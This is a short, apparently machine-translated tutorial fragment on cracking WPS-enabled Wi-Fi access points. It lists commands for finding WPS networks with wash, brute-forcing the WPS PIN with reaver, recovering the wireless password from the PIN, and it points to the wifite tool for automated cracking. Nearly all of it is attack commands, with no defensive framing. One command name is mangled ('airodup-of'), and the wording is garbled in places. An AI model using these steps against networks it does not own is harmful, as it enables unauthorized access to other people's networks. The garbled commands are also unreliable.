1, enable listening mode (Monitor Mode), the AP found that support WPS If you enter a listening mode please refer to the first two chapters articles about WPA WEP attacks
wash -C -i wlan0mon # -C -i ignore the error frame specified NIC
airodup-of wlan0mon --wps
2, the PIN blasting
reaver -i wlan0mon -b <AP mac> -vv # -vv show details
3, after the PIN obtained by the following instruction fetch wireless password
reaver -i wlan0mon -b <AP mac> -vv -p 88888888 # -p acquired PIN code
Dry! ! Integrated automation wireless password cracking tools wifite